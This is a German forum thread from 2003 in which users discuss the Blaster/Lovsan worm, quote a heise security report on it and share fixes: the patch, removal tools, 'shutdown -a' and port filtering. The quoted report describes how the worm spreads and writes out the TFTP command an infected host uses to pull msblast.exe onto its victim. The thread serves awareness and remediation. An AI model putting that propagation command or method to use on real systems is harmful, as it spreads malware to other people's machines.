Virus?
-
-
Also hier nochmal ein paar Infos's dazu:
Sicherheitslücke lässt Rechner crashen
Seit einigen Stunden wird Sicherheitslücke im RPC (Remote) von Windows ziemlich stark attackiert. Betroffene User erhalten eine Nachricht, dass ihr PC in 60 Sekunden neu gestartet werde. Nach kurzer Zeit taucht diese Meldung erneut auf. Betroffen sind die Systeme Windows 2000/XP/Server 2003 & NT 4.0.
Microsoft hat aber bereits einen Patch seit 2 Monaten dagegen auf ihren Download Servern. Folgt dem Link zum Download.
Update:
Die Jungs von der Gamestar haben noch folgenden Tip am Start:
Update: Nach der Installation des Patches und einem PC-Neustart sollten Sie die Datei msblast.exe suchen und löschen. Entfernen Sie auch alle passenden Eintrage aus der Registry. Öffnen Sie diese über Start, Ausführen, regedit und suchen Sie nach dem Dateinamen und löschen Sie Einträge, achten Sie aber darauf, wirklich nur diese Einträge zu markieren.Dann gibst hier noch das MSBLAST Remove Tool
-
Hier noch der Artikel vom heise-newsticker:
Meldung vom 12.08.2003 09:30
Alle Schotten dicht -- W32.Blaster greift anDer seit Tagen erwartete Wurm, der einen Fehler im RPC/DCOM-Dienst unter Windows 2000 und XP ausnutzt, ist im Internet unterwegs. Symantec taufte ihn W32.Blaster, McAfee nennt ihn W32.Lovsan. Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat ebenfalls bereits eine Warnung herausgegben, siehe dazu das BSI-Advisory auf heise Security.
Auf befallenenen Systemen (A) startet der Wurm einen TFTP-Server und greift weitere Windows-Systeme (B) auf Port 135 an. War ein Angriff erfolgreich, wird der eingeschleuste Code ausgeführt, der auf System B eine Shell auf Port 4444 öffnet. System A veranlasst System B mittels TFTP (tftp <host a> get msblast.exe) die Datei msblast.exe in das Verzeichnis %WinDir%\System32 nachzuladen und zu starten. Anschließend installiert sich der Wurm auf System B, schließt Port 4444, startet einen TFTP-Server und greift weitere Systeme an.
Der Wurm versucht nach Angaben von Symantec eine Denial-of-Service-Attacke gegen windowsupdate.com durchzuführen. Als Zeitraum dafür ist der 16. August bis 31. Dezember definiert. Auf befallenen Systemen werden folgende Registry Einträge erzeugt:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Run "windows auto update" = msblast.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Run "windows auto update" = msblast.exe I just want to say LOVE YOU SAN!! billErkennbar ist ein Befall auch am offenen UDP-Port 69, auf dem der TFTP-Server auf ankommende Verbindungen wartet. Darüberhinaus öffnet ein infiziertes System 20 TCP-Ports im Bereich 2500 bis 2522 und versucht Verbindungen mit weiteren Systemen aufzunehmen. Der genaue Zweck dieser Verbindungen ist noch unklar, Symantec gibt an, dass sie zu Angriffszwecken geöffnet werden. NAI weist hingegen darauf hin, dass die Ports im LISTEN-Mode geöffnet werden, also auf eingehende Verbindungen warten.
Symantec hat bereits ein Removal-Tool bereitgestellt, um den Wurm von befallenen System zu entfernen.
Es wird dringend empfohlen, die Patches zum Beseitigen der Sicherheitslücke einzuspielen. Da der Patch einen weiteren Fehler im RPC-Dienst, der DoS-Attacken ermöglicht, nicht beseitigt, sollten zusätzlich die UDP- und TCP-Ports 135 bis 139, 445 und 593 gefiltert werden. (dab/c't)
Link dazu -
steht alles in meiner news
-
Zitat
Original von chrlen
Ich möchte mal alle Linux/UNIX/Mac-User grüssen, die diese Problem nicht haben. :skull1*SCNR*
ach immer das gleiche. unix ist sicherer... blabla! wenn soviele user unix hätten wie windows und umgekehrt würden natürlich auch nur die windows system gecrackt, nicht das (bei usern) populärste system, sicher doch -
also ich konnte den coutdown auf keine weise sotoppen! wiue hast du das gemacht?
-
Zitat
Original von Spunky
also ich konnte den coutdown auf keine weise sotoppen! wiue hast du das gemacht?START->Ausführen->CMD->shutdown -a
-
Juhu, ich hatte recht
-
Zitat
Original von DaZnoopee
ach immer das gleiche. unix ist sicherer... blabla! wenn soviele user unix hätten wie windows und umgekehrt würden natürlich auch nur die windows system gecrackt, nicht das (bei usern) populärste system, sicher dochhrhr es geht nicht um das UNIX ist einfach viel sicherer !!
-
Von wegen Virusschutzprogi, ich benutze seit über nem Jahr keines mehr und hatte noch nie einen drauf :p
Dafür hab ich ne HW Firewall -
Zitat
Original von DarkLordSilver
hrhr es geht nicht um das UNIX ist einfach viel sicherer !!aber natürlich ist ein open-source-code viel sicherer als ein proprietäres system
-
bei mir kam heute das selbe Problem. bei meinem Windows XP wurde auch nach 60 sekunden runtergefahren, aber es ist glücklicherweise noch alles in ordnung!
-
Zitat
Original von TOUCH
bei mir kam heute das selbe Problem. bei meinem Windows XP wurde auch nach 60 sekunden runtergefahren, aber es ist glücklicherweise noch alles in ordnung!heieiei bei mir jo auch...da geht was rum....
-
Was passiert wen man Remote abgeschaltet hat?
Ach ja ich hatte den Wurm bisher noch nicht. Habe winxp und weder FW noch Virenscanner drauf. Könnte auch daran liegen das mein Xp das runterfahren verweigert solange noch ein symbol neben der uhr ist Endlich mal ein nützlicher bug).
-
w32.worm hab heute 5 kunden PC vom virus befreien können ;)= http://www.planet3dnow.de hat alles was brauchst um den virus zu deinstallen
-
als ich gestern morgen aufgestanden bin habe ich grad den anmelde sound von windows gehört.....
komisch das die kiste neustartete... läuft sonst nähmlich immer durch, kann das auch das selbe problem sein?würd mich wundern, habe kaspersky AVP virenprogi und zonealarm pro drauf, auch finde ich keine mblaster datei im sys...
-
Ja, du hast einen anderen PC im Netz, wo der Wurm drauf ist, der versuscht sich jetzt an alle zu verschicken und macht nebenbei noch reboots der Rechner..
shutdown -a hilft
-
Kann es sein, dass mein Home-LAN nach dem Patch nun spinnt? Konnte heute morgen mit dem 2. Rechner nicht ins Netz.
-
Bei Micrososft ist eh alles möglich..
-
jo, ist schon möglich. Es kackt mich einfach an, jetzt kann ich wieder ewigs lange nach dem Problem suchen. Dabei wollte ich doch endlich mal den Barebone aufsetzen...